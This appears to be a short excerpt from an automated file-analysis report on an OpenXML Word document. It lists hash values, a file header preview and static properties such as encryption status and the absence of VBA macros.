                                                      TLSH:7FC2D13CA45D7078D2594AFC580BB7B3EB300CA1E974B669B5D78D9E6449817173E1C0
                                                      File Content Preview:PK..........!.....e...R.......[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                      Icon Hash:35e5c48caa8a8599
                                                      Document Type:OpenXML
                                                      Number of OLE Files:1
                                                      Has Summary Info:
                                                      Application Name:
                                                      Encrypted Document:False
                                                      Contains Word Document Stream:True
                                                      Contains Workbook/Book Stream:False
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:False
                                                      Flash Objects Count:0
                                                      Contains VBA Macros:False